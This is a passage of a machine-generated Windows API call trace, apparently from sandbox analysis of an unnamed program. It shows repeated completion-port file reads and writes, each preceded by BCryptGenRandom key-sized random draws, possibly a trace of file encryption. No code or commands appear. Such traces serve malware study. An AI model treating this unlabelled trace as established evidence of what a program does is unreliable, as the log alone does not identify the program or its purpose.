1 [0109.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.257] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.268] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd16, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.269] CloseHandle (hObject=0x13c0) returned 1 [0109.270] free (_Block=0x1ff1e60) [0109.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.278] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.278] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.278] free (_Block=0x77d800) [0109.278] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.278] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.278] free (_Block=0x1fa4848) [0109.278] free (_Block=0x2071818) [0109.278] free (_Block=0x77d908) [0109.278] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.280] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.281] CloseHandle (hObject=0x13c0) returned 1 [0109.281] free (_Block=0x1ff1e60) [0109.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.290] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.290] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.290] free (_Block=0x77d800) [0109.291] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.291] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.291] free (_Block=0x1fa4848) [0109.291] free (_Block=0x2071818) [0109.291] free (_Block=0x77d908) [0109.291] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.292] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.306] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.306] CloseHandle (hObject=0x13c0) returned 1 [0109.308] free (_Block=0x1ff1e60) [0109.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.320] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.320] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.320] free (_Block=0x77d800) [0109.320] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.320] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.321] free (_Block=0x1fa4848) [0109.321] free (_Block=0x2071818) [0109.321] free (_Block=0x77d908) [0109.321] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.322] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.355] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x94a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.355] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.366] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.423] CloseHandle (hObject=0x13c0) returned 1 [0109.425] free (_Block=0x1ff1e60) [0109.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.436] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.450] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x31f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.475] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.480] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.481] CloseHandle (hObject=0x81c) returned 1 [0109.484] free (_Block=0x3e70008) [0109.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.495] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x634, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.495] CloseHandle (hObject=0x2f4) returned 1 [0109.496] free (_Block=0x3db00b8) [0109.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.534] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x804, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.548] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x15cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.582] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.599] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.610] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0109.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.625] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf38, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.639] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xed4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.661] CloseHandle (hObject=0x13c0) returned 1 [0109.664] free (_Block=0x3e70008) [0109.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.674] CloseHandle (hObject=0x3bc) returned 1 [0109.676] free (_Block=0x3d70048) [0109.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.679] CloseHandle (hObject=0x3ac) returned 1 [0109.682] free (_Block=0x3db00b8) [0109.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.687] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.687] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.712] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xda6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3a94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.755] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.755] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.755] free (_Block=0x77d800) [0109.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.755] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.756] free (_Block=0x1fa4848) [0109.756] free (_Block=0x2071818) [0109.756] free (_Block=0x77d908) [0109.756] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.773] CloseHandle (hObject=0x3ac) returned 1 [0109.774] free (_Block=0x3ef0008) [0109.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.791] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x292a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.816] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.816] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.816] free (_Block=0x77d800) [0109.816] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.816] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.817] free (_Block=0x1fa4848) [0109.817] free (_Block=0x2071818) [0109.817] free (_Block=0x77d908) [0109.817] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.835] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.845] GetProcAddress (hModule=0x753f0000, 